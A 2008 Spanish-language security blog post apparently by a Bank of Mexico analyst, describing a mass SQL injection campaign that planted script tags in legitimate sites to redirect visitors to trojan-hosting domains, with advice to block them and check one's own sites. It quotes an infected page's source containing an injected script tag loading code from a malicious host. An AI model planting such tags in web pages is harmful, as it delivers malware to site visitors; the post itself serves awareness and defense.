Por Fausto Cepeda 

Apareció una noticia en Security Magazine (23/04/2008) y VirusBulletin (24/04/2008) de que varios miles de sitios legítimos han sido afectados por un ataque de inyección de código SQL; al parecer sitios como algunos bajo la responsabilidad de Naciones Unidas o el gobierno británico fueron exitosamente infectados.

Una vez que se ha efectuado la inyección de código, el sitio legítimo redirige al usuario a sitios maliciosos para que se intente bajar un troyano. Los sitios maliciosos son: nmidahena.com, aspder.com y nihaorr1.com; esto puede cambiar porque de hecho estos sitios ya no están en línea, al menos cuando los revisé (aún así, no está de más bloquearlos en el firewall).

Ejercicio sencillo de Comprobación:

Si buscan en Google por “script src http  nmidahena.com” o “script src http  nihaorr1.com“, encontrarán miles de sitios que fueron inyectados con código. Posteriormente ingresan al sitio y en su navegador le ponen “Ver Código Fuente” para que observen el código de la página web. Una vez hecho esto, buscan por “nmidahena, aspder o nihaorr1″; háganlo todo esto con cuidado (si es posible desde una máquina virtual como Virtual PC de Microsoft que es gratuita). He llevado a cabo esta búsqueda en Google y no todos los sitios que aparecen enlistados continúan infectados. Vale la pena que chequen los suyos, espero no se lleven una sorpresa. He revisado un par de sitios mexicanos “famosos”  y al parecer no se han visto afectados.

Por ejemplo, el sitio “http://www.sssri.com/websiteenglish/default.asp” aún sigue afectado, en el código fuente de su página web se observa (al día de hoy) la referencia al sitio “nmidahena.com“:

==
<html>
<head>
<meta http-equiv=Content-Type content=text/html; charset=gb2312>

<title>Shanghai Ship and Shipping Res<script src=http://www.nmidahena.com/1.js></script></title>
<script language=javascript >
 function JumpDef()
 {
  window.location.href=”../home.htm”;
 }
</script>
<style>

==
Pueden leer la noticia en:

http://www.scmagazineus.com/Mass-attack-infects-hundred-of-thousands-of-reputable-sites/article/109361/
http://www.virusbtn.com/news/2008/04_24.xml?rss=

Algunos buenos consejos para mitigar este ataque:
http://www.f-secure.com/weblog/archives/00001427.html

Fausto Cepeda es ingeniero en Sistemas Computacionales por el ITESM, CCM. Es Maestro de Seguridad de la Información por la Universidad de Londres en el Reino Unido. Ha sido Consultor de Seguridad y actualmente es Analista de Sistemas en la Oficina de Seguridad Informática del Banco de México. También cuenta con la certificación de seguridad CISSP (Certified Information Systems Security Professional).

Compártelo